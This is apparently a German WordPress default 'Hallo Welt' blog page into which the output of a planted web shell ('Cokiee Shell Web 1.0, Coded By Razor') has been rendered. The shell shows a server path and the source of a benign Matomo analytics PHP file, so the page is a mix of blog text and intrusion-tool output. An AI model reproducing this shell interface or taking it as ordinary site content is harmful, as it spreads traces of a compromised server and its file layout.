Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /var/www/web28/html/wp-content/plugins/matomo/app/core/ViewDataTable/ |
Current File : //var/www/web28/html/wp-content/plugins/matomo/app/core/ViewDataTable/Request.php |
<?php /** * Matomo - free/libre analytics platform * * @link https://matomo.org * @license https://www.gnu.org/licenses/gpl-3.0.html GPL v3 or later */ namespace Piwik\ViewDataTable; use Piwik\API\Request as ApiRequest; use Piwik\Common; class Request { /** * @var null|\Piwik\ViewDataTable\RequestConfig */ public $requestConfig; public function __construct($requestConfig) { $this->requestConfig = $requestConfig; } /** * Function called by the ViewDataTable objects in order to fetch data from the API. * The function init() must have been called before, so that the object knows which API module and action to call. * It builds the API request string and uses Request to call the API. * The requested DataTable object is stored in $this->dataTable. * * @param array $forcedParams Optional parameters which will be used to overwrite the request parameters */ public function loadDataTableFromAPI($forcedParams = []) { // we build the request (URL) to call the API $requestArray = $this->getRequestArray(); $requestArray = array_merge($requestArray, $forcedParams); // we make the request to the API $request = new ApiRequest($requestArray); // and get the DataTable structure $dataTable = $request->process(); return $dataTable; } /** * @return array URL to call the API, eg. "method=Referrers.getKeywords&period=day&date=yesterday"... */ public function getRequestArray() { // we prepare the array to give to the API Request // we setup the method and format variable // - we request the method to call to get this specific DataTable // - the format = original specifies that we want to get the original DataTable structure itself, not rendered $requestArray = array('method' => $this->requestConfig->apiMethodToRequestDataTable, 'format' => 'original'); $toSetEventually = array_merge(array('filter_limit', 'keep_totals_row', 'keep_summary_row', 'filter_sort_column', 'filter_sort_order', 'filter_excludelowpop', 'filter_excludelowpop_value', 'filter_column', 'filter_pattern', 'flat', 'totals', 'expanded', 'pivotBy', 'pivotByColumn', 'pivotByColumnLimit'), $this->requestConfig->getExtraParametersToSet()); foreach ($toSetEventually as $varToSet) { $value = $this->getDefaultOrCurrent($varToSet); if (false !== $value) { $requestArray[$varToSet] = $value; } } $segment = ApiRequest::getRawSegmentFromRequest(); if (!empty($segment)) { $requestArray['segment'] = $segment; } if (ApiRequest::shouldLoadExpanded()) { $requestArray['expanded'] = 1; } $requestArray = array_merge($requestArray, $this->requestConfig->request_parameters_to_modify); if (!empty($requestArray['filter_limit']) && $requestArray['filter_limit'] === 0) { unset($requestArray['filter_limit']); } if ($this->requestConfig->disable_generic_filters) { $requestArray['disable_generic_filters'] = '1'; } if ($this->requestConfig->disable_queued_filters) { $requestArray['disable_queued_filters'] = 1; } if (!empty($requestArray['compareSegments'])) { $requestArray['compareSegments'] = Common::unsanitizeInputValues($requestArray['compareSegments']); } return $requestArray; } /** * Returns, for a given parameter, the value of this parameter in the REQUEST array. * If not set, returns the default value for this parameter @see getDefault() * * @param string $nameVar * @return string|mixed Value of this parameter */ protected function getDefaultOrCurrent($nameVar) { if (isset($_GET[$nameVar])) { return Common::sanitizeInputValue($_GET[$nameVar]); } return $this->getDefault($nameVar); } /** * Returns the default value for a given parameter. * For example, these default values can be set using the disable* methods. * * @param string $nameVar * @return mixed */ protected function getDefault($nameVar) { if (isset($this->requestConfig->{$nameVar})) { return $this->requestConfig->{$nameVar}; } return false; } }
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare